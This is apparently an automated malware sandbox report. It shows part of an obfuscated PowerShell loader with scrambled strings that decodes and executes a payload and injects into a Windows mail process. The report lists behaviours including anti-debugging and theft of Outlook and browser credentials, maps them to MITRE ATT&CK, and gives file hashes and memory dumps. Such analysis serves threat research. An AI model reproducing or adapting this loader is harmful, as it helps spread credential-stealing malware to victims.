:OmrysCPosthlHovedAAfhasnDiploLTripae AnemsPeppiSHudo =PathoNFortjE ExtrwJulel-PrecoOBddelBGinnej fiduETarifCPleniTSangu skrivsTaarnyFlyttSSti nTA ailETamboMOv rw. DruknFjumreErgott.oved.Ner eWFininEGeolobVbnencPoetilVerdeiMaskie Ha.snIndkot');$Bengnaveres+=$Baandlggelse[1];Pedologic59 ($Bengnaveres);Pedologic59 (Teleskopaffjedringer 'Aktiv$Bio eC irculFortraRobinnBrestl Buffe Beh.sF.skesExost.PretrHStille DeepaSlut dAranee ynanrHiplispostv[ Ther$RefelGPopkouSun haRoudkmGymnouSp jtcAsp rhGra diFreellHurdl] larm=Fr sc$prcisK ErgooAr,aloBalnet flejcun ouhRadioa VelsrBgesp ');$Scrammed=Teleskopaffjedringer 'Bicar$Sonn,CP,oevlTer eaOpgr.n WonglGravre DamssSinlesRstis. t ivDHype oNudiswOmhygnHaplolafsliochestaUnjuddNeuraF limico ntlDiskeeSakra(Dep h$Ther NPestey egasd ExtraCharln AfrunAmathe FishlBrochsGnathe.permnParti, A li$Po,ynCRowlohAmat aSadeln c.vaeF ngilFo.dml Vogn)Charl ';$Chanell=$Baandlggelse[0];Pedologic59 (Teleskopaffjedringer 'Un.en$IndiaGRevallK preOKo dibKamufAStereLoplri:PlantGBy.niOklimpdPericSA tritUnco.oMisadgDispoE.hana=Skole( Difftsol eENedkuSFusedTU der-Prs dPRdha AHengitG neth Roug Filre$ Att CKildehDrammARe,lun Bs eeUnf oL vikil Udpo)Rerow ');while (!$godstoge) {Pedologic59 (Teleskopaffjedringer 'Ato i$Fa tigSideal F.ueoUnt abA,abiaBai,ilUdske:FiskeKUnderaImmorf ElegfFe lte SturpPaedouAut dnDu,fac S.rahXantheTogrerprs ns lgu=Sam e$atr ctS,mphrPrediu,deryevanes ') ;Pedologic59 $Scrammed;Pedologic59 (Teleskopaffjedringer 'DramaSTopputunsinaMajusrsvenntR fle- For SBursalSekveeFakkeeCoh bpProta Bache4Bevil ');Pedologic59 (Teleskopaffjedringer 'C.uga$S,mvig tilvlAnlgsoUds.lbK.yneaSten,l.naps:ProdigUnd poKtu hdepitesB.lurtUn,rooFe ongFe,lbeAbefe= Skde(Clea T lugte HuslsCanaltSbeva-KontoPP ychaV lstt Resihlando forpl$krimiC DyrehInteraSnigsnReekseVe,telSmaallAu is)Bost ') ;Pedologic59 (Teleskopaffjedringer ' Vege$ TidsgUnexcl,egreoPu teb GrooaBr enl Hypo:,owisR AkkoeD.centYeorlsBeklasTrekay oncsc pittLympheUnfixmEnepi=Ext a$ pulegGiredl almeoemb,lbGuldmaPim,elEd ti:.cecaK,urswoHva.pnnaboftKron,rTrkkro TelelFibrifFl stu.ytjenHentekTagkatUnivaiFo teoMylden rosteStretrAcephsHjovn2Ungut3Aands0Infec+Melod+Derma%Embry$Op orT urleoMitchlMorgevEksemaHstma.DikelcKoreco DomsuSnrenno ridtStats ') ;$Nydannelsen=$Tolva[$Retssystem];}$Hovedstadsregionens=324505;$Primost=29091;Pedologic59 (Teleskopaffjedringer 'Skjor$Overgg ,pkalOver.oDecapbKvivaaSynodlKr,om:HieraSre,inuB.tsepSyreneL,engrMa temUn cqnDewladBavn sS.itt H ems=B sge Rem.sGAnd,oeAlenetKlamr- She CAppeloAperinillintFormeeHeptanpretztFeud, Prech$ OverC aubeh I.enamimesnLovpreKvalil DrowlBe ns ');Pedologic59 (Teleskopaffjedringer 'Baads$FremlgSl.efl motoo MejebNetbaaPandal Brev: CyrtBp ycha RendnTryktiOarl.sUnc kt BarseSethir St eiBol inHel iereser be bn=Bekli Si e[ VotaS RastyFo tssan.ectSvbelePlatfm Anti.AarskCFo ieo iparnA gifvRa aseTredvrOplystAltin]Lrerp:famil:Si.niFSubcrrPersoo oncamReinkBScaphaChucks,orkleSynag6Ordni4Ma emS Ny ttbrnepr DemoiS btenKonkrgSuper(barr,$K.tekStyng,u reatpSyn.aeMacadrBr scmRese.n WaffdOmgresderm,)Uphea ');Pedologic59 (Teleskopaffjedringer 'Dalle$ SagegUdartlAflaaorazzebUra,salivstl nutg:.ealiCKnepaoafskyeKotallGrn.eoNonpumL.ste U.bom=Ka,tu Sand [ TenoSEfte yBussesThorot SkyleBruttm edru.VrisnTUn.roeSterrxFullatCommu.KollaELimfanBugtacOmbrioEmeridOpkr,iB atinComebgSubsp]defat: usm:VildtAT.kmaS Ex lCSkinnI yritI atte.Emb yGNonmoeB,thltPunicSAl,entF ettrTriani HegenBifidgFestp(A dic$cur aBRheinaDec,inUngdoiSexbosLiegetKal ieA.drarFabriistueanoplggeFo.an) tand ');Pedologic59 (Teleskopaffjedringer 'fores$ Uni.gKabellComicoR furb ZagraGl rilE cip:RumenHTalriuInconlTromphHobroeBagerdmidpoe.rdspn Im es erm= Puna$UnfraCVisseoTalleeAtroflk,mbioToro m M,nu.Uncons olyu Forsb Ti.hsSt ertS.bstrMistriKanonn En.ogtelep(Ansva$To.awHKonomoD agovLegateratepdSacchsFil,btundera Skuldindics MaiorH.llee Evn,gKvartiKllino o.ernGasflePlantnGlazisEnep.,Locom$ Udd P ngdorLatriiCeltom ennoC.ntrs sedrtKrigs)Wed l ');Pedologic59 $Hulhedens;"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2332
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bardehval.Enz && echo t"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1096
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        Accesses Microsoft Outlook profiles
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:1632

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

1

T1555

Credentials from Web Browsers

1

T1555.003

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Bardehval.Enz

Filesize
460KB

MD5
e048f9895e60b14e68f76e0fcadd5d08

SHA1
5a0e7bbb4c32a5aab5d3b85ffd49b89b745e3c8a

SHA256
5db5b10985a7f39cc9fcfc42b352709355f3b83a724b9fa24b8806c9feb3b029

SHA512
5ef521cee99243aef2621caac9f0ae85357ee4ab84b80452dfe473d473e9a0e965717d5abd3445f73456104afbe76b6e819e666f77df4bb32b6cb7132ce069f0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1846800975-3917212583-2893086201-1000\0f5007522459c86e95ffcc62f32308f1_f9da27c9-c625-43c3-9b3a-b1344b01e128

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1846800975-3917212583-2893086201-1000\0f5007522459c86e95ffcc62f32308f1_f9da27c9-c625-43c3-9b3a-b1344b01e128

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0ZO0DP59RGO3OAQS2XLM.temp

Filesize
7KB

MD5
b26726a381c4376fb7781e2ad94c2d5c

SHA1
313c69f071fce6a463bd2bd6a15664f2b85cc649

SHA256
ec6ba67ae7c136865d77bffdf574de386ec6208b44f6a8127f4534df8fecbbd0

SHA512
9739af22cc588d081042f61d5dea60c283ec69c65cd28192445e1fba2cf3ed481b23902a53a100e33da40b0b5ac4636bc5fa2e080216efc817dd8661fd3096c7

Download Submit
memory/1632-45-0x0000000000F90000-0x00000000068EF000-memory.dmp

Filesize
89.4MB

Download
memory/1632-44-0x0000000000400000-0x0000000000581000-memory.dmp

Filesize
1.5MB

Download
memory/1632-21-0x0000000000F90000-0x00000000068EF000-memory.dmp

Filesize
89.4MB

Download
memory/2332-20-0x0000000006720000-0x000000000C07F000-memory.dmp

Filesize
89.4MB

Download
memory/2680-9-0x000007FEF5440000-0x000007FEF5DDD000-memory.dmp

Filesize
9.6MB

Download
memory/2680-13-0x000007FEF5440000-0x000007FEF5DDD000-memory.dmp

Filesize
9.6MB

Download
memory/2680-17-0x000007FEF5440000-0x000007FEF5DDD000-memory.dmp

Filesize
9.6MB

Download
memory/2680-18-0x000007FEF5440000-0x000007FEF5DDD000-memory.dmp

Filesize
9.6MB

Download
memory/2680-19-0x000007FEF5440000-0x000007FEF5DDD000-memory.dmp

Filesize
9.6MB

Download
memory/2680-12-0x000007FEF56FE000-0x000007FEF56FF000-memory.dmp

Filesize
4KB

Download
memory/2680-4-0x000007FEF56FE000-0x000007FEF56FF000-memory.dmp

Filesize
4KB

Download
memory/2680-8-0x000007FEF5440000-0x000007FEF5DDD000-memory.dmp

Filesize
9.6MB

Download
memory/2680-46-0x000007FEF5440000-0x000007FEF5DDD000-memory.dmp

Filesize
9.6MB

Download
memory/2680-7-0x000007FEF5440000-0x000007FEF5DDD000-memory.dmp

Filesize
9.6MB

Download
memory/2680-6-0x00000000020C0000-0x00000000020C8000-memory.dmp

Filesize
32KB

Download
memory/2680-5-0x000000001B7D0000-0x000000001BAB2000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing